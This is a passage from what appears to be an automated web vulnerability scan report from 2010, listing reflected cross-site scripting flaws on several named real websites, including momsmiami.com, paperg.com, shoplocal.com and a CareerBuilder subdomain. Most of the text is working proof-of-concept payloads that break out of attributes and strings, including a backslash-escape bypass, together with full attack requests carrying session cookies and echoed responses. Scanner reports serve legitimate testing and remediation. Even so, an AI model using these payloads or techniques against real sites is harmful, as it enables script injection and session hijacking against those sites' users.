<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html>
<head>
<SCRIPT LANGUAGE="JavaScript"> <!-- var gomez={ gs: new Date().getTime(), acctId:'D3FD89', pgId:'v-newsletter1f1b7';alert(1)//6fc0ef752d5', grpId:'Miami Herald' };
var gomez=gomez?gomez:{};gomez.h3=function(d, s){for(var p in s){d[p]=s[p];}return d;};gomez.h3(gomez,{b3:function(r){if(r<=0)return false;return Math.random()<=r&&r;},b ...[SNIP]...
The value of the blog_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3350"><script>alert(1)</script>5cb7dc9a388 was submitted in the blog_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?a=profile&u=2&t=blog&blog_id=3035d3350"><script>alert(1)</script>5cb7dc9a388 HTTP/1.1
Host: www.momsmiami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_o4oj7_k=; phpbb3_o4oj7_u=1; phpbb3_o4oj7_sid=72ca88ed4b4731c0e1975d5915fcbe53;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <!-- blogs --> <!-- sta ...[SNIP]... <a href="/?a=profile&u=2&t=blog&blog_id=3035d3350"><script>alert(1)</script>5cb7dc9a388"> ...[SNIP]...
The value of the link_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8219c"><script>alert(1)</script>62f20d5abff was submitted in the link_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?a=birthday_pages&link_id=298219c"><script>alert(1)</script>62f20d5abff HTTP/1.1
Host: www.momsmiami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_o4oj7_k=; phpbb3_o4oj7_u=1; phpbb3_o4oj7_sid=72ca88ed4b4731c0e1975d5915fcbe53;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6eaa2"><script>alert(1)</script>f0ceec3a72 was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?a=profile&u=2&t=blog6eaa2"><script>alert(1)</script>f0ceec3a72&blog_id=3035 HTTP/1.1
Host: www.momsmiami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_o4oj7_k=; phpbb3_o4oj7_u=1; phpbb3_o4oj7_sid=72ca88ed4b4731c0e1975d5915fcbe53;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <!-- blogs --> <!-- sta ...[SNIP]... <a href="/?a=profile&u=2&t=blog6eaa2"><script>alert(1)</script>f0ceec3a72&blog_id=3035"> ...[SNIP]...
The value of the blog_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51c09"><script>alert(1)</script>51fe99986e0 was submitted in the blog_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /forum/memberlist.php?mode=viewprofile&u=2&t=blog&blog_id=347551c09"><script>alert(1)</script>51fe99986e0 HTTP/1.1
Host: www.momsmiami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_o4oj7_k=; phpbb3_o4oj7_u=1; phpbb3_o4oj7_sid=72ca88ed4b4731c0e1975d5915fcbe53;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <!-- blogs --> <!-- sta ...[SNIP]... <a href="/?a=profile&u=2&t=blog&blog_id=347551c09"><script>alert(1)</script>51fe99986e0"> ...[SNIP]...
2.236. http://www.momsmiami.com/forum/memberlist.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.momsmiami.com
Path: /forum/memberlist.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c174"><script>alert(1)</script>28e9ec410ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /forum/memberlist.php?mode=viewprofile&u=2&t=blog&blog_id=/8c174"><script>alert(1)</script>28e9ec410ab3475 HTTP/1.1
Host: www.momsmiami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_o4oj7_k=; phpbb3_o4oj7_u=1; phpbb3_o4oj7_sid=72ca88ed4b4731c0e1975d5915fcbe53;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <!-- blogs --> <!-- sta ...[SNIP]... <a href="/?a=profile&u=2&t=blog&blog_id=/8c174"><script>alert(1)</script>28e9ec410ab3475"> ...[SNIP]...
The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7e94"><script>alert(1)</script>ee4ccd85f90 was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /forum/memberlist.php?mode=viewprofile&u=2&t=blogd7e94"><script>alert(1)</script>ee4ccd85f90&blog_id=3475 HTTP/1.1
Host: www.momsmiami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_o4oj7_k=; phpbb3_o4oj7_u=1; phpbb3_o4oj7_sid=72ca88ed4b4731c0e1975d5915fcbe53;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <!-- blogs --> <!-- sta ...[SNIP]... <a href="/?a=profile&u=2&t=blogd7e94"><script>alert(1)</script>ee4ccd85f90&blog_id=3475"> ...[SNIP]...
The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84690"><script>alert(1)</script>3bc91134198 was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?a=profile&t=blog84690"><script>alert(1)</script>3bc91134198&u=2&date=new HTTP/1.1
Host: www.momsmiami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_o4oj7_k=; phpbb3_o4oj7_u=1; phpbb3_o4oj7_sid=72ca88ed4b4731c0e1975d5915fcbe53;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <!-- blogs --> <!-- sta ...[SNIP]... <a href="/?a=profile&u=2&t=blog84690"><script>alert(1)</script>3bc91134198&blog_id=3475"> ...[SNIP]...
The value of the c request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a354"><script>alert(1)</script>f9d100f9d13 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /view_photo.php?c=8059a354"><script>alert(1)</script>f9d100f9d13&photo=1162&t=home&TB_iframe=true&height=600&width=730&modal=true HTTP/1.1
Host: www.momsmiami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_o4oj7_k=; phpbb3_o4oj7_u=1; phpbb3_o4oj7_sid=72ca88ed4b4731c0e1975d5915fcbe53;
The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d36a"><script>alert(1)</script>8c772da80c8 was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /view_photo.php?c=805&photo=1162&t=home3d36a"><script>alert(1)</script>8c772da80c8&TB_iframe=true&height=600&width=730&modal=true HTTP/1.1
Host: www.momsmiami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_o4oj7_k=; phpbb3_o4oj7_u=1; phpbb3_o4oj7_sid=72ca88ed4b4731c0e1975d5915fcbe53;
The value of the 514e9 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d23b'-alert(1)-'2f0a88819c9 was submitted in the 514e9 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jsfb/embed.php?pid=4350&bid=2267&514e97d23b'-alert(1)-'2f0a88819c9 HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=tgkar1ao449m0cf8fnr8i5oqb2;
var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '174.121.222.18';
var view = '';
var edit = '0';
var EMBED_URL2267 = 'http://www.paperg.com/jsfb/embed.php?pid=4350&bid=2267&514e97d23b'-alert(1)-'2f0a88819c9';
//-- getting all script elements from document
var scripts = document.getElementsByTagName('script');
//-- grabbing our script element
var scriptEl = scripts[ scripts.length - 1 ];
The value of the 514e9'-alert(1)-'c9c3e793f35 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b45a5'-alert(1)-'33bc75a77ed was submitted in the 514e9'-alert(1)-'c9c3e793f35 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '174.121.222.18';
var view = '';
var edit = '0';
var EMBED_URL2267 = 'http://www.paperg.com/jsfb/embed.php?pid=4350&bid=2267&514e9'-alert(1)-'c9c3e793f35=1b45a5'-alert(1)-'33bc75a77ed';
//-- getting all script elements from document
var scripts = document.getElementsByTagName('script');
//-- grabbing our script element
var scriptEl = scripts[ scripts.length - 1 ];
The value of the bid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 18be1%3balert(1)//7595c8d1dbb was submitted in the bid parameter. This input was echoed as 18be1;alert(1)//7595c8d1dbb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '174.121.222.18';
var view = '';
var edit = '0';
var EMBED_URL226718be1;alert(1)//7595c8d1dbb = 'http://www.paperg.com/jsfb/embed.php?pid=4350&bid=226718be1%3balert(1)//7595c8d1dbb';
//-- getting all script elements from document
var scripts = document.getElementsByTagName('script'); ...[SNIP]...
The value of the bid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6a1d'-alert(1)-'544a3639a3c was submitted in the bid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '174.121.222.18';
var view = '';
var edit = '0';
var EMBED_URL2267b6a1d'-alert(1)-'544a3639a3c = 'http://www.paperg.com/jsfb/embed.php?pid=4350&bid=2267b6a1d'-alert(1)-'544a3639a3c';
//-- getting all script elements from document
var scripts = document.getElementsByTagName('script');
//-- grabbing our script element
var scriptEl = scripts[ scripts.length - 1 ];
...[SNIP]...
2.245. http://www.paperg.com/jsfb/embed.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.paperg.com
Path: /jsfb/embed.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 514e9'-alert(1)-'c9c3e793f35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '174.121.222.18';
var view = '';
var edit = '0';
var EMBED_URL2267 = 'http://www.paperg.com/jsfb/embed.php?pid=4350&bid=2267&514e9'-alert(1)-'c9c3e793f35=1';
//-- getting all script elements from document
var scripts = document.getElementsByTagName('script');
//-- grabbing our script element
var scriptEl = scripts[ scripts.length - 1 ]; ...[SNIP]...
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a4e3'-alert(1)-'ba6e9cc672 was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '174.121.222.18';
var view = '';
var edit = '0';
var EMBED_URL2267 = 'http://www.paperg.com/jsfb/embed.php?pid=43501a4e3'-alert(1)-'ba6e9cc672&bid=2267';
//-- getting all script elements from document
var scripts = document.getElementsByTagName('script');
//-- grabbing our script element
var scriptEl = scripts[ scripts.length ...[SNIP]...
2.247. http://www.rentalhomesplus.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rentalhomesplus.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fff53"-alert(1)-"c1b63fc5c18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?fff53"-alert(1)-"c1b63fc5c18=1 HTTP/1.1
Host: www.rentalhomesplus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
2.248. http://www.shoplocal.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.shoplocal.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4390'-alert(1)-'aca305d9be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?e4390'-alert(1)-'aca305d9be=1 HTTP/1.1
Host: www.shoplocal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=uioo4y55ykop5355roagiprp; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; expires=Wed, 14-Nov-2035 23:45:10 GMT; path=/
Set-Cookie: Prefs=SLHPageCounter=1&detid=9940000000&SessionCookiesSet=true; path=/
P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 23:45:09 GMT
Connection: close
Content-Length: 56291
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]...
<script language="javascript">
var pt = new Image();
pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?e4390'-alert(1)-'aca305d9be=1&action=home&viewmode=local&referrer=&random=897241575&siteid=252&SessionID=0&pagecounter=1&detid=9940000000&slhlogon=' + readSubCookie('SLHUID','UID');
</script> ...[SNIP]...
The value of the client request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1853c"style%3d"x%3aexpression(alert(1))"40924e9e725 was submitted in the client parameter. This input was echoed as 1853c"style="x:expression(alert(1))"40924e9e725 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
2.250. http://yourblogs.miamiherald.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://yourblogs.miamiherald.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2473"><script>alert(1)</script>d18d2a8007 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?b2473"><script>alert(1)</script>d18d2a8007=1 HTTP/1.1
Host: yourblogs.miamiherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:53:43 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
ETag: d04fd3aaf6ab2773e6e35b65c34361f5
X-RSS-CACHE-STATUS: MISS
Last-Modified: Sun, 14 Nov 2010 21:45:19 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 109951
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html>
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d5fd\'%3balert(1)//663d5006bad was submitted in the Referer HTTP header. This input was echoed as 9d5fd\\';alert(1)//663d5006bad in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /?lr=cbcb_mhf48aa HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=9d5fd\'%3balert(1)//663d5006bad
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 199301
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: BEAR25
Date: Sun, 14 Nov 2010 23:35:15 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title> Accoun ...[SNIP]...
'; s_cb.channel='JS_FindJobs';
s_cb.prop1='AG Subdomain Home';
s_cb.eVar11='NotRegistered';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - 9d5fd\\';alert(1)//663d5006bad';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f6fc\'%3balert(1)//8602fe1ed7 was submitted in the Referer HTTP header. This input was echoed as 9f6fc\\';alert(1)//8602fe1ed7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET / HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=9f6fc\'%3balert(1)//8602fe1ed7
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 199290
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: REBEL35
Date: Sun, 14 Nov 2010 23:23:27 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title> Accoun ...[SNIP]...
'; s_cb.channel='JS_FindJobs';
s_cb.prop1='AG Subdomain Home';
s_cb.eVar11='NotRegistered';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - 9f6fc\\';alert(1)//8602fe1ed7';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 114ab\'%3balert(1)//117bf833582 was submitted in the Referer HTTP header. This input was echoed as 114ab\\';alert(1)//117bf833582 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /JobSeeker/Jobs/JobResults.aspx HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=114ab\'%3balert(1)//117bf833582
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 186387
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: jobresults.aspx:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR37
Date: Sun, 14 Nov 2010 23:28:24 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title> Job Se ...[SNIP]...
='Job Results';
s_cb.eVar5='JS_AS_Job Type';
s_cb.eVar11='NotRegistered';
s_cb.eVar14=', ';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - 114ab\\';alert(1)//117bf833582';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56918\'%3balert(1)//e3aa076828a was submitted in the Referer HTTP header. This input was echoed as 56918\\';alert(1)//e3aa076828a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
